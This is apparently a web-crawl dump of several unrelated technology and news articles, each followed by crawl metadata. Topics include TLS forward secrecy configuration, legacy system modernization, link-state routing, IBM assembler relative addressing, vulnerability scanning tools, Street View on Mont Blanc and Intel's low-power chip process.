truth to things, and all we have to do is apply reason to uncover it. Sure, it may change over time, but hopefully only to move even closer to the “true truth.” It is in the field of information management that this classic attitude is most visible. Professionals concerned with defining key performance indicators, putting together organizational taxonomies and building data warehouses have been looking for a single version of the truth since the advent of the information management discipline. It seems that most organizations have fundamental alignment issues in defining the terminology they use. In fact, I have formulated a “law” that describes the gravity of the problem: The more a term is connected to the core of the business, the more numerous are its definitions. There might be ten or more definitions of what constitutes revenue in a sales organization, what a flight means to an airline or how to define a customer for a mobile telephone provider. Few have been successful in reaching one version of the truth. Business managers have fiercely resisted. Machiavelli might have pointed toward political motives of business managers since a single version of the truth would limit their flexibility to choose the version of the truth that fits their story best. 
However, IT professionals say business managers should see that the benefits of satisfying their own goals are less important than the satisfaction of contributing to the success of the overall organization. In fact, ignoring less important needs for the benefit of higher pleasures is a hallmark of human civilization. So much for civilization if we can't even achieve this in the workplace. Are IT specialists fighting windmills like Don Quixote? As I've discussed, the philosophers disagree whether there is a single objective truth or not.2 Postmodernists go only as far as to suppose joint observations, but others come to the aid of the classical IT professional. The American philosophical school of pragmatism states that we can call a statement true when it does all the jobs required of it. It fits all the known facts; matches with other well-tested theories, experiences and laws; withstands criticism; suggests useful insights and provides accurate predictions. If this is all the case, what stops us from calling it "true"? But let's stick to postmodernism for a while. To explain the failure of reaching a single version of the truth, postmodernists would point to the IT professionals themselves – they are simply misguided. There actually is a very elegant and simple solution for the "one version of the truth" problem. "What is it?" I can hear you ask. I'll share that with you in my next article.
<urn:uuid:1b41102d-75d9-45a0-8c55-c04895adcd03>
CC-MAIN-2017-04
http://www.b-eye-network.com/view/15680
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963753
1,746
2.953125
3
With revelations about mass surveillance in the news everywhere, an obscure feature of SSL/TLS called forward secrecy has suddenly become very interesting. So what is it, and why is it so interesting now? Session keys generation and exchange Every SSL connection begins with a handshake, during which the parties communicate their capabilities to the other side, perform authentication, and agree on their session keys, in the process called key exchange. The session keys are used for a limited time and deleted afterwards. The goal of the key exchange phase is to enable the two parties to negotiate the keys securely, in other words, to prevent anyone else from learning these keys. Several key exchange mechanisms exist, but, at the moment, by far the most commonly used one is based on RSA, where the server’s private key is used to protect the session keys. This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server’s private key can also uncover the session keys and thus decrypt everything. For some, the side-effects are desirable. Many network security devices, for example, can be configured to decrypt communication (and inspect traffic) when given servers’ private keys. Without this capability, passive IDS/IPS and WAF devices have no visibility into the traffic and thus provide no protection. In the context of mass surveillance, however, the RSA key exchange is a serious liability. Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic. Eventually, they might obtain the key in one way or another (e.g., by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances) and, at that time, they will be able to go back in time to decrypt everything. Diffie-Hellman key exchange An alternative to RSA-based key exchange is to use the ephemeral Diffie-Hellman algorithm, which is slower, but generates session keys in such a way that only the two parties involved in the communication can obtain them. No one else can, even if they have access to the server’s private key.1 After the session is complete, and both parties destroy the session keys, the only way to decrypt the communication is to break the session keys themselves. This protocol feature is known as forward secrecy.2 Now, breaking strong session keys is clearly much more difficult than obtaining servers’ private keys (especially if you can get them via a warrant). Furthermore, in order to decrypt all communication, now you can no longer compromise just one key (the server’s), but you have to compromise the session keys belonging to every individual communication session. SSL and forward secrecy SSL supports forward secrecy using two algorithms, the standard Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). Why isn’t everyone using them, then? Assuming the interest and knowledge to deploy forward secrecy is there, two obstacles remain: - DHE is significantly slower. For this reason, web site operators tend to disable all DHE suites in order to achieve better performance. In recent years, we’ve seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys. - ECDHE too is slower, but not as much as DHE. (Vincent Bernat published a blog post about the impact of ECDHE on performance, but be warned that the situation might have changed since 2011. 
I am planning to do my own tests soon.) However, ECDHE algorithms are relatively new and not as widely supported. For example, they were added to OpenSSL only fairly recently, in the 1.x releases. If you're willing to support both ECDHE and DHE, then you will probably be able to support forward secrecy with virtually all clients. But ECDHE alone is supported by all major modern browsers, which means that even with only ECDHE you might be able to cover a very large chunk of your user base. The decision about what to do is entirely up to you. Google, for example, do not support any DHE suites on their main web sites.
Configuring forward secrecy
Enabling forward secrecy can be done in two steps:
1. Configure your server to actively select the most desirable suite from the list offered by SSL clients.
2. Place ECDHE and DHE suites at the top of your list. (The order is important; because ECDHE suites are faster, you want to use them whenever clients support them.)
Knowing which suites to enable and move to the top can be tricky, because not all browsers (devices) support all forward secrecy suites. At this point you may want to look for inspiration from those who are already supporting forward secrecy, for example Google. In a nutshell, these are some of the suites you might want to enable (3) and push (close) to the top: To make this process easier, I've added a new feature to the SSL Labs test; this feature, tentatively called handshake simulation, understands the capabilities of major browsers and determines which suite would be negotiated with each. As a result, it also tells you if the negotiated suite supports forward secrecy. Here's what it looks like in action: When you get it right, you will be rewarded with a strong forward secrecy indicator in the summary section at the top:
Alternative attack vectors
Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions powerful adversaries could take. For example, they could convince the server operator to simply record all session keys. Server-side session management mechanisms could also impact forward secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated (possibly never in extreme cases). Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise forward secrecy. (1) Someone with access to the server's private key can, of course, perform an active man in the middle attack and impersonate the server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic to decrypt later. (2) It's also sometimes called perfect forward secrecy, but, because it is possible to uncover the communication by breaking the session keys, it's clearly not perfect. (3) I am assuming the most common case, that you have an RSA key (virtually everyone does). There's a number of ECDHE suites that need to be enabled if you're using an ECDSA key. I am also ignoring GCM suites for the time being, because they are not very widely supported. I am also ignoring any potential desire to mitigate BEAST by favouring RC4, which might be impossible to do across all client devices.
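As a quick client-side complement to the SSL Labs test, you can check which suite a given server negotiates with your own TLS stack. This is my illustration, not part of the original article; the hostname is just an example, and the name-prefix check applies to TLS 1.2-style suite names:

    import socket
    import ssl

    HOST = "www.example.com"  # replace with the server you want to check

    context = ssl.create_default_context()
    with socket.create_connection((HOST, 443)) as raw_sock:
        with context.wrap_socket(raw_sock, server_hostname=HOST) as tls_sock:
            name, protocol, bits = tls_sock.cipher()
            print(name, protocol, bits)
            # ECDHE and DHE suites provide forward secrecy; plain RSA key
            # exchange does not. (All TLS 1.3 suites use ephemeral key
            # exchange, so their names no longer carry the ECDHE prefix.)
            print("forward secrecy:", name.startswith(("ECDHE", "DHE")))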
<urn:uuid:5eb8cecb-b0a8-4564-b5e8-2c22642bce24>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2013/06/26/ssl-labs-deploying-forward-secrecy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00017-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931003
1,478
3.265625
3
Modernize Legacy Systems to Enable Full Potential
This is the first of a two-part series on modernization of legacy systems. Read part two. Many topics discussed in this article are independent of platform—mainframe, client-server and distributed systems. The word modernization is used to describe ongoing innovation that's worked into an application in periodic projects or more gradually over time. Sometimes applications run for a long time with only business or defect maintenance applied, then suddenly they need to be modernized as they lack important features relating to their user interface or the way that data management is handled.
Overview of Legacy Systems
Legacy systems are sometimes called "systems of record." They could be running on mainframe, client-server, multi-tier distributed systems or a hybrid combination of different architectures. To some, the phrase legacy system is a pejorative term. To others, a legacy system has the advantage of being an incumbent system that's running and providing value to the organization.
What Is Modernization?
Modernization can mean different things to different people in IT. Legacy or software modernization refers to the conversion, rewriting or porting of an existing application to a modern computer programming language with new libraries, protocols or hardware platform. The goal of this transformation is to retain and extend the value of the past software investment through migration to a new platform. This is one way of describing modernization, where you make a significant change in the context of a one-time project. Other definitions involve leaving the legacy platform in place and providing updated interfaces, like supplementing CICS maps with a web front end or using modern API software to create an application that transforms the data in the legacy application without any changes to the application itself. Another incremental modernization approach would involve selective replacement (e.g., swapping conventional file systems with a database management system). Doing this opens the door to many advantages that derive from using a database versus a file system, and you don't have to replace all the files. Many companies have embraced the idea that applications should be both maintained and modernized as part of normal day-to-day operations. These companies have money and people allocated to a given application set. They distribute resources between fixing the application and making other necessary changes, leaving time and assets for keeping up with strategic needs. This has become a common practice for companies that are balanced in their approach and are trying to avoid plunging into a large-scale technology migration.
Benefits, Strategies, Risk and Cost
Modernization should be an ongoing activity in the lifecycle of a system or application. Changes in business practices cause changes in an application, as does the rapid evolution of technology. Careful planning is required to balance routine change and strategic initiative, but this isn't too much to expect for a mission-critical application. One benefit of modernization is continued satisfaction with an application after it's updated with a web interface or application on a mobile device. Without these improvements, user satisfaction could decline. Improved productivity is also a benefit of modernization.
The use of mobile devices with an application can mean that a user can take a tablet onto the production floor to check inventory, with a customer on the phone, without having to go back to their desk to enter transactions. Today, many companies are embracing process improvements like continuous integration and deployment methods. These practices support modernization changes like adding a new capability or changing a function in a parallel implementation. In many ways, modernization is a good fit for these new IT processes, making it possible to integrate modernization with the other ongoing activities. There's risk in making change, both maintenance and modernization. There's also risk in not embracing new technology. When a company's competitor is building applications for smartphones and the company doesn't have a similar initiative, there's a risk of losing a future customer base that has significant digital expectations. For many industries, customers with modern digital preferences are highly desirable, high-income users. Ongoing modernization is less costly than replacement, as it preserves the function in the current system. Certain kinds of modernization (e.g., embracing automated testing and deployment) can reduce overall costs and improve application quality.
Challenges and Areas of Focus
When making a significant modernization change to an application, an incremental approach is least disruptive and should be used whenever possible. Often, this means breaking up a large project into smaller units that can be piloted, or run in phases or in parallel with the existing functionality. For modernization, what should be the focus? A place to start is updating the user interface, which often means utilizing the web and making use of mobile devices. Another area is data modernization, which might involve converting from files to databases and layering other functionality like data replication. Another area for modernization is function modernization, which has to do with enhancements like packaging application elements into components for use as services. Another focus for modernization could be rooted in making good use of enhancements in the current software technology that's supporting the application. If the application is written in COBOL, look at one of the latest releases, like Enterprise COBOL for z/OS Version 5. This release, among other features, makes use of the latest z/Architecture and performance optimization, delivers XML processing enhancements for easier web interoperability, and increases compiler limits to handle larger data items and larger groups of data and to improve application exploitation of system resources. Like COBOL, CICS and IMS have significant functional enhancements in each release that should be put to use by applications as part of ongoing modernization. Making fuller use of the middleware that is foundational to the application has the potential for significant gain that on balance may not be difficult to implement. The next article explores in detail specific tactics to use within specific areas, including updating the user interface, data modernization, function modernization, process modernization, and more fully using language and middleware enhancements.
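As a small illustration of the service-wrapping approach mentioned above (exposing an existing function as a modern API without changing the legacy application itself), here is a hedged sketch in Python using the Flask framework; the inventory lookup is a hypothetical stand-in for whatever transaction or call the legacy system actually provides:

    from flask import Flask, jsonify

    app = Flask(__name__)

    def legacy_inventory_lookup(item_id: str) -> dict:
        # Placeholder for the existing system of record (e.g., a CICS
        # transaction, an IMS call, or a flat-file read). The legacy code
        # itself is left untouched; only this wrapper is new.
        return {"item_id": item_id, "on_hand": 42}

    @app.route("/inventory/<item_id>")
    def get_inventory(item_id):
        # The wrapper translates the legacy result into JSON so that web
        # and mobile front ends can consume it.
        return jsonify(legacy_inventory_lookup(item_id))

    if __name__ == "__main__":
        app.run()

The same pattern applies whether the wrapper runs next to the legacy system or on a separate integration tier; the point is that the interface can be modernized without rewriting the system of record.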
<urn:uuid:1bed5511-9d8d-41a7-a1e8-b6a778a0e967>
CC-MAIN-2017-04
http://ibmsystemsmag.com/ibmi/developer/modernization/legacy-system/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00413-ip-10-171-10-70.ec2.internal.warc.gz
en
0.918035
1,248
2.78125
3
Ah, Google, your Street-View publicity stunts never fail to entertain. This time, the Mountain View pranksters have stuck their 360-degree cameras up an actual mountain—Mont Blanc, to be precise. In fact, Google claims to also be helping scientists track the effects of global climate change. This is while the ice atop the massif is said to be shrinking. In IT Blogwatch, bloggers feel cold just looking at it. Your humble blogwatcher curated these bloggy bits for your entertainment. We need news. Trevor Hughes has views on the views—Google Street View cameras top Mont Blanc for 360-degree views: Google has made it possible to visit one of Europe's most storied peaks from the comfort of your computer...Mont Blanc, the highest of the Alps. The peak on the French-Italian border is about 15,777 feet high [and] covered in a perpetual snow-and-ice field. Viewers also can virtually "walk" across the Mer de Glace — a river of ice that experts...say is endangered by global warming. Viewers also can [get] the perspective of a paraglider, a speeding trail-runner and a skier who shows off some dazzling aerial flips. Far out, man. Frederic Lardinois writes Google Hauls Its Street View Cameras Up The Mont Blanc: For this project, Google partnered with a number of photographers, skiers, mountaineers, climbers and runners to build up this library of...imagery. You get images of some of the most iconic trails around the mountain in the summer and winter [and] see what Mont Blanc looks like from the perspective of an ice climber, for example. Now here's an appropriate name. It's Cam Bunton, with Google's latest breathtaking addition to Street View is a virtual tour of Mont Blanc: Google's new virtual exploration is simply breathtaking, and easily worth a few minutes of your time. Google has littered the mountain with a bunch of awesome 360-degree Photo Spheres. You'll get a look around the summit. ... You'll be able to climb up a serac. Google wants to preserve what it can...so that future generations can see what it used to look like, and so that scientists can see how it's changing. But why does Google do these things? Tom Dawson thinks he knows—Google Brings Street View to Majestic Mont Blanc: Street View has become an interesting side-project for the Google Maps team, and it's arguably become part of pop culture. Street View now offers users one more piece of culture to explore from the comfort of their tablets, phones or computers. We can't help but think Google is doing these sort of things...to help with their Cardboard project. Regardless, there's more fun and inspiring content to ogle over. We could do with a local voice, too. Bonjour, Oliver Gee. Ça va? Climb Mont Blanc from your armchair thanks to Google: The American search engine sent a team of climbers, skiers, and photographers to the summit. ... The result is spectacular. For the ascent...it was elite guide Korra Pesce who carried the Street View Trekker up...the Goûter Route of the mountain. See a summary...in the video below. You have been reading IT Blogwatch by Richi Jennings, who curates the best bloggy bits, finest forums, and weirdest websites… so you don't have to. Catch the key commentary from around the Web every morning. Hatemail may be directed to @RiCHi or firstname.lastname@example.org. Opinions expressed may not represent those of Computerworld. Ask your doctor before reading. Your mileage may vary. E&OE.
<urn:uuid:f34daf4c-e13a-4e05-b46a-4c02afa2988b>
CC-MAIN-2017-04
http://www.computerworld.com/article/3025484/cloud-computing/google-street-view-mont-blanc-itbwcw.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00257-ip-10-171-10-70.ec2.internal.warc.gz
en
0.906088
813
2.78125
3
We’ve discussed several techniques to improve the performance of Distance-Vector (D-V) protocols. With that accomplished, the next thing to do is to examine their scalability. With the D-V protocols, as the size of an internetwork grows, the number of prefixes to be advertised and stored grows, requiring greater bandwidth and RAM. Also, as the number of routing updates increases, more CPU power is required to send and receive the updates. Around 1990, based on the projected growth of internetworks, it became apparent that the scalability of the D-V protocols would present a problem. To deal with this, an entirely new category of routing protocols was developed: the “Link-State” protocols. Each Link-State router builds a topology database that contains everything that router knows about the topology of the internetwork. This information includes which IP prefixes are directly connected to which routers, and the metric information for each prefix. It’s referred to as a “Link-State” protocol because each router knows the detailed prefix (link) and metric (state) information…in other words, the state of the links. It’s like a jigsaw puzzle, where each router contributes a piece of the puzzle (the prefixes to which it is directly connected). The goal is to collect all of the pieces, and then assemble the puzzle. Each router begins by placing an entry for itself in its topology database. Next, the router uses a “hello” protocol to discover its directly connected neighbors. The neighbors then exchange topology information. When an update containing new topology information is received, the router adds that piece to its topology database, and then floods that piece. Each neighbor does the same. When this process is complete, all routers will have detailed information about the entire topology, and each router can then determine the best path from itself to each destination prefix. Think of the internetwork as being like a shopping mall. There’s a map near each door that shows where all the stores are. Because it’s all one mall the maps are identical, except for one thing: the “You Are Here” marker. We can use the nearest map to find the best route from where we are to each of the stores that we’d like to visit. Similarly, each router has a topology database. Because all of the routers are part of one internetwork, all of the topology databases are identical. Using its copy of the topology database, each router individually calculates the best next hop for each known destination prefix, and places this information in its routing table. At this point, routing has converged. There are, however, a few differences between a real Link-State protocol and our shopping mall analogy. First, the maps in the mall are diagrams, while routers keep the topology databases in table form. Second, while most shoppers are interested in visiting only a few stores within the mall (there may be exceptions), routers calculate the best next hop for all known prefixes. Key Point: With a Link-State protocol, what’s being advertised from one router to another is raw topology information, not routing table entries. As a result, each Link-State router knows the entire topology of the internetwork. Since the topology updates are acknowledged (making the protocol reliable), there is no need for frequent periodic updates. Instead, updates need only be sent when a topology change occurs. In between changes, the hello protocol is used to verify the continued availability of neighbors. 
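To make the "each router computes its own best paths" step concrete, here is a minimal sketch (not from the original article) of the shortest-path-first calculation a link-state router performs over its topology database; the routers, links and costs below are made up purely for illustration:

    import heapq

    # Hypothetical topology database: router -> {neighbor: link cost}
    topology = {
        "R1": {"R2": 10, "R3": 5},
        "R2": {"R1": 10, "R4": 1},
        "R3": {"R1": 5, "R4": 20},
        "R4": {"R2": 1, "R3": 20},
    }

    def shortest_paths(source: str) -> dict:
        # Dijkstra's algorithm: the same calculation every router runs
        # independently against its (identical) copy of the topology database.
        dist = {source: 0}
        visited = set()
        queue = [(0, source)]
        while queue:
            cost, node = heapq.heappop(queue)
            if node in visited:
                continue
            visited.add(node)
            for neighbor, link_cost in topology[node].items():
                new_cost = cost + link_cost
                if new_cost < dist.get(neighbor, float("inf")):
                    dist[neighbor] = new_cost
                    heapq.heappush(queue, (new_cost, neighbor))
        return dist

    print(shortest_paths("R1"))  # {'R1': 0, 'R2': 10, 'R3': 5, 'R4': 11}

In a real implementation the result would be translated into next-hop entries for the routing table, but the core idea is the same: identical topology databases, independent best-path calculations.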
Next time, we’ll look at Link-State protocols in more detail, including some real-world examples. Author: Al Friebe
<urn:uuid:7baa68ff-0d51-4dd7-89aa-cb7d451d5f4c>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2009/10/26/routing-protocols-part-6/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00073-ip-10-171-10-70.ec2.internal.warc.gz
en
0.929266
771
2.859375
3
"Everybody thinks kids are ruining their language by using instant messaging, but these teens' messaging shows them expressing themselves flexibly through all registers," linguist Sali Tagliamonte said in a prepared statement. "They actually show an extremely lucid command of the language. We shouldn't worry." Researchers at the University of Toronto report that IM does not deserve its bad reputation as a syntax spoiler. Tagliamonte and Derek Denis studied about 70 Toronto teens and compared their use of language in speech and instant messaging. They presented their findings at the Linguistics Society of Canada and the United States annual meeting Wednesday. According to the researchers, 80 percent of Canadian teens use instant messaging and adopt its shorthand. The study found that instant messaging language mirrors patterns in speech but teens fuse informal and formal speech. It concluded that adverse claims about instant messaging are overblown. "Teens are using both informal forms that their English teachers would never allow, yet they also use formal writing phrasing that, if used in speech, would likely be considered 'uncool," the researchers said through a statement released Monday.
<urn:uuid:a83d3bbb-26db-41a7-9580-270867506060>
CC-MAIN-2017-04
http://www.networkcomputing.com/unified-communications/teens-im-talk-ok-study/1274320738
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281226.52/warc/CC-MAIN-20170116095121-00467-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963074
221
2.546875
3
The influence of Linux has created new choices in the marketplace, resulting in an unparalleled opportunity for banks to develop ground-breaking technology architectures, whether or not they eventually adopt the new operating system. For the major software camps - IBM, Sun Microsystems and Microsoft - Linux represents a monumental strategic turning point, and the resulting computing environment for their customers is no less revolutionary. In the early days of enterprise computing, there was a one-to-one correspondence among hardware platforms, operating systems and applications. Applications were written to run on specific operating systems, and an operating system worked only on a certain class of hardware. The entire "stack" comprised an indivisible unit. But thanks to the influence of Linux, that cozy world is gone. Linus Torvalds began writing the Linux operating system in 1991 to teach himself how to use the Intel 80386 chip. As such, the program was initially designed to take advantage of the chip's idiosyncrasies. But the operating system itself was not idiosyncratic - it was based on the same technical specifications as the Unix operating system running on mainframes. Linux soon gained adherents. Some were attracted by the philosophy of the open-source movement, while others found it to be an inexpensive way to host a Web server. Technology professionals quickly recognized the business potential of Linux. By porting Unix applications to Linux, it would be possible to swap out high-cost Unix servers for commodity x86 machines. Until that point, the only migration option for a Unix shop had been to rebuild and redevelop under Windows, which typically was not an attractive proposition for companies with significant legacy investments.
<urn:uuid:bb32b5db-b31b-4a15-96f9-49b8ec92f9cd>
CC-MAIN-2017-04
http://www.banktech.com/data-and-analytics/http--wwwintelligententerprisecom-channels-applications-showarticlejhtmlarticleid-201202011/d/d-id/1290115
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00009-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952071
330
2.8125
3
For the last 7 or 8 years, cable has been the dominant player in high speed internet access. Like Kleenex with tissues and Q-Tips with cotton swabs, cable companies have carved out such a dominant position within the industry that many people now view “cable” and “high speed internet” as terms that can be used interchangeably. Now is a particularly interesting time to be discussing cable because it is facing a major challenger to its market dominance in Verizon Fios. How It Works Cable networks form the bridge between your home computer and the high-speed data lines that are the backbone of the internet. As mentioned above, the main data transmission lines within cable networks are fiber, but the individual lines (or “last mile”) that are run into people’s homes are coaxial cable. This is similar to how DSL networks operate: fiber optics for most of the network, legacy twisted copper telephone lines for the last mile to individual homes. However, unlike DSL, coaxial cable is shielded which means that it does not suffer from the signal loss issues that twisted copper telephone lines do over distances. This is probably the single biggest reason why cable has successfully dominated DSL in the US, because cable companies were so effective at reminding consumers that “cable is always fast, whereas DSL isn’t fast if you are too far away from the provider”. That is not an entirely true statement however, as cable has its own speed-related issues. If you live in a population dense area where many people use cable (i.e. an apartment building), your connection can be slowed because you are sharing the same coaxial cable lines as other people. Cable is like DSL in that a single transmission line is used: the same transmission lines used for cable television are also used for cable internet. In order to give you both cable television and internet, a splitter is installed on the coaxial cable coming into your home, with one end going to your cable television box and the other end going to a cable modem. Keys to Cable 1) Don’t Be Dense – If you live in an apartment building or other population dense area, it is good idea to investigate how fast a cable connection will be. Seek out neighbors who have cable internet service and find out how fast they think the service is or see if they will actually let you test drive their connection. 2) Know Your Limits – Cable internet service is usually offered at 3 (or even more) different speed levels, each at various price points. Making an initial speed selection is important, but not as important as testing the actual speed that you are getting once it is installed. You sometimes won’t be able to get the speeds that are advertised do to the speed issues identified above. So if you’re paying for a higher speed than you’re capable of getting, make sure you adjust your plan down to a lower speed level so you don’t overpay month to month. Click the “Internet Speed Test” link on the right-hand side of the page to test your speed once you are up and running to see if any plan adjustment is necessary. 3) Make a Deal – Cable internet connections are generally offered by cable companies like Comcast and Time Warner that are well-known for offering discounts on bundled services, like VoIP phone, cable television and cable internet service. Make sure you take advantage of these deals by bundling your services together.
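The "Know Your Limits" advice above comes down to measuring the throughput you actually get and comparing it with the tier you pay for. The Python sketch below is one rough way to do that; the test URL is a placeholder rather than a real endpoint, and a dedicated speed-test service will give more reliable numbers.

import time
import urllib.request

TEST_URL = "http://example.com/testfile.bin"  # placeholder; point this at a known large test file

def measure_download_mbps(url, max_bytes=5_000_000):
    # Download up to max_bytes and report average throughput in megabits per second.
    start = time.time()
    received = 0
    with urllib.request.urlopen(url) as response:
        while received < max_bytes:
            chunk = response.read(65536)
            if not chunk:
                break
            received += len(chunk)
    elapsed = time.time() - start
    return (received * 8 / 1_000_000) / elapsed

if __name__ == "__main__":
    print("Approximate download speed: %.1f Mbps" % measure_download_mbps(TEST_URL))

If the measured figure is consistently below the plan you pay for, that is the signal to adjust your tier or call your provider.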
<urn:uuid:7ef56704-e8e7-408e-b82a-b27d8220deec>
CC-MAIN-2017-04
http://www.highspeedexperts.com/internet-services/cable/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00311-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953096
722
2.71875
3
As we have seen, all symbolic addresses are based on variants of the concept of a base address (stored in a base register) and an offset. Note that the offset, encoded as a 12-bit unsigned integer, is always non-negative; the possible offset values range from 0 through 4095 inclusive. We now introduce a way to reference a storage position relative to the symbolic address of another label. This allows direct reference to unlabeled storage. The form of a relative address is LABEL+N, where N is the byte offset of the desired storage relative to the symbolic address associated with LABEL. Again, note the lack of spaces in the relative address; this is important. Consider the two data declarations:
F1 DC F'0' (a four-byte fullword)
F2 DC F'2' (another fullword, at address F1 + 4)
The following two instructions are therefore identical:
L R6, F2
L R6, F1+4
Relative Addressing: A More Common Use
The most common use of relative addressing is to access an unlabeled section of a multi-byte storage area associated with a symbolic address. Consider the following very common declaration for card data, which sets aside 80 bytes of storage to receive the 80 characters associated with standard card input:
CARDIN DS CL80
While only the first byte (at offset 0 from CARDIN) is directly named, we may use relative addressing to access any byte directly. The second byte of input is at address CARDIN+1, the third at CARDIN+2, and so on. Remember that the byte at address CARDIN+N is the character in column (N + 1) of the card, because punched cards do not have a column 0.
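The offset arithmetic is easy to model outside the assembler. The small Python sketch below is illustrative only; it imitates byte offsets into an 80-byte card buffer rather than real System/370 addressing, and the sample text is invented.

# 80-byte storage area, analogous to CARDIN DS CL80 (bytes.ljust pads with blanks)
card_image = bytearray(b"HELLO WORLD".ljust(80))

def byte_at(base, offset):
    # Mimic a relative address such as CARDIN+N; offsets are 12-bit unsigned (0..4095).
    if not 0 <= offset <= 4095:
        raise ValueError("offset outside the 12-bit displacement range")
    return base[offset]

print(chr(byte_at(card_image, 0)))   # column 1 of the card: 'H'
print(chr(byte_at(card_image, 6)))   # column 7 of the card: 'W'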
<urn:uuid:ac2275a0-246a-4695-9782-989b27bcee12>
CC-MAIN-2017-04
http://www.edwardbosworth.com/MY3121_LectureSlides_HTML/RelativeAddressing.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00219-ip-10-171-10-70.ec2.internal.warc.gz
en
0.854381
393
3.796875
4
Recently, Microsoft released security updates for a total of 23 vulnerabilities for Microsoft products. While this may seem like a lot, these situations do occur. This points to the speed at which new exploits are created and the fact that vendors must rush to patch these vulnerabilities. Some of the most common vulnerabilities businesses face today are unpatched systems and applications. This is one of the primary reasons why vulnerability assessment tools have become so important. These tools can find and identify needed patches, insecure settings, buffer overflows, and a whole host of other security issues. Luckily, there are many vulnerability assessment tools that can be used to find these problems and fix them before they are exploited. Believe it or not, vulnerability assessment was not created until the mid 1990s. One of the first was Security Administrator Tool for Analyzing Networks. Dan Farmer and Wietse Venema developed it and since then, there have been many vulnerability assessment tools developed. Some examples include: - LAN Guard - Open VAS What all of these tools have in common is that they assess an organization’s applications, computers, and networks to identify technical vulnerabilities before an attacker can exploit them. Generally, vulnerability assessment tools fall into three basic categories: source code scanners, application scanners, and system scanners. System scanners are one of the most widely used as they probe networks, systems, and their components rather than individual applications. They are also used to test the effectiveness of layered security measures. Most users tend to run these tools on a periodic basis such as weekly or bi-weekly. Most of these tools will list discovered vulnerabilities as: critical, high, medium, or low. Once identified, these tools will point you to a means to mitigate the problem, typically through the installation of a patch. The discovered problems are identified by means of a CVE. The CVE or Common Vulnerabilities and Exposures, is simply a system designed to provide a reference-method for publicly known information-security vulnerabilities and exposures. If you’ve never looked at the list of CVEs, you will want to check out http://cve.mitre.org. My personal tip is that even if your company cannot afford a commercial vulnerability assessment tool start with a free one such as Open VAS. Running a vulnerability scanner on a periodic basis is one of the most effective things a business can do to avoid common vulnerabilities. Also, keep in mind that you may not be able to fix all identified vulnerabilities. Start with what is identified as critical. These issues should be your first priority then work on items identified as high, medium, and low. Once you get the vulnerability system up and running then you can start using it long term to measure, monitor, and report on information security progress. The best time to start using one of these tools is now, don’t wait until you have a security breach!
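The "start with critical, then work down" advice translates directly into a triage step over scanner output. The Python sketch below shows the idea only; the finding records, hosts, and CVE identifiers are made up and do not follow any particular tool's report format.

# Severity ranking used to order remediation work (critical first)
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Example findings; the CVE identifiers and hosts below are invented
findings = [
    {"cve": "CVE-2013-1111", "severity": "medium",   "host": "10.0.0.5"},
    {"cve": "CVE-2013-2222", "severity": "critical", "host": "10.0.0.7"},
    {"cve": "CVE-2013-3333", "severity": "high",     "host": "10.0.0.5"},
]

def triage(items):
    # Unknown severities sort last so nothing is silently dropped.
    return sorted(items, key=lambda f: SEVERITY_ORDER.get(f["severity"], 99))

for finding in triage(findings):
    print(finding["severity"].upper(), finding["cve"], "on", finding["host"])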
<urn:uuid:a2f6fdaf-6d8f-47b2-ae8f-0a23a163a9d7>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2013/06/28/vulnerability-assessment-tools/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00127-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946726
583
2.734375
3
Intel Remixes Chip Recipe to Cut Power
The chipmaker will add, in 2007, a new manufacturing process aimed at helping it cook up low-power chips. Intel Corp. plans to begin cutting the power consumption of its chips right at the factory. The chip giant will on Tuesday unveil a plan to create an alternate version of its manufacturing process technology, the means by which it knits together the transistors that make up the circuits inside its chips, designed to yield more power-efficient processors and supporting chipsets for notebooks, handhelds and other battery-powered devices. Intel, which at one time focused much of its efforts on building faster and faster processors (chips that inevitably also used more power), has taken a new path of late, announcing plans to deliver less power-hungry processors within all of its x86 product lines, including desktop, notebook and server chips, in 2006. By the end of the decade, the company has said, it will deliver chips that use even less power for handheld devices. It intends the alternate manufacturing process to dovetail with the low-power chip design efforts. The new process, which is based on P1264, Intel's 65-nanometer manufacturing technology that's due to come on line later this year, tweaks the way transistors (the tiny on/off switches inside its chips), as well as the wires that connect them, are formed. The changes, which include steps such as thinning the wires slightly and thickening the layers of material that insulate a part of the transistor known as the gate, help cut down on leakage, or electricity that slips past after a transistor switches off, Intel 